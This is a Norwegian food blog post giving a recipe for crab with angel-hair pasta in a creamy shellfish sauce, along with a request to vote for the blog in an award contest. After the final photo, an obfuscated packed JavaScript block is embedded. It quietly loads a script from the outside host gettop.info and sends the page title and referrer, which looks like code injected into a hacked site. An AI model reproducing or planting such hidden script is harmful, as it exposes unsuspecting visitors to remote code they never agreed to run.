Krabbe i kremet saus med nudler og tomat

2krabbepasta-1024x680

Høst og vinter er tiden for krabbe. Det er nå den er på sitt beste. Fungerer perfekt i en hektisk hverdag. Kjapt og enkelt. Dette er en favoritt i reprise og her serverer jeg den i en kremet saus sammen med englehårpasta, fersk eller tørket om du vil. Risnudler fungerer også fint om du vil.

Så en god nyhet! Jeg har blitt nominert som semifinalist i Vixen Blog Awards. Fantastiskt med tanke på at det finnes så mange flinke matbloggere der ute, jeg er ydmyk og takknemlig:) Men, jeg trenger dere hvis jeg skal komme til målstreken. Her kan du stemme på meg, du kan stemme flere ganger, hver dag faktisk:) http://www.vixen.no/arets-semifinalister/arets-matblogg/ Takk!

Ingredienser12-1024x644

Ingredienser

6 pers

ca 700 gr englehår (tagliarini)

4 krabbeskjell

2 tomater

1 selleristang1 rød paprika

ca 1 l skalldyrskraft

3 dl kremfløte

kajennepepper

salt og pepper

Persille

kraftogflote-1024x680

  1. Reduser skalldyrskraften til ca 5 dl, tilsett kremfløten og reduser ytterliger til ca 3 dl. Del tomatene og fjern innmaten, finhakk. Finhakk selleristangen og putt opp i kraften. La kajennpepper koke med hele veien. Bruk en stavmikser og lag en suppeaktig konsistens,smak av med salt og pepper.
paprika2-1024x650

2. Del paprikaen i små terninger og legg i sausen, kok i ca 5 minutter.

3. Kok pastaen etter anvisningen på pakken, slå av vannet. Hell sausen over i kjelen og toss med pastaen. Klipp over litt kruspersille. Nyt!

1krabbepasta-1024x680

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))

Write a comment

Your email address will not be published. Required fields are marked *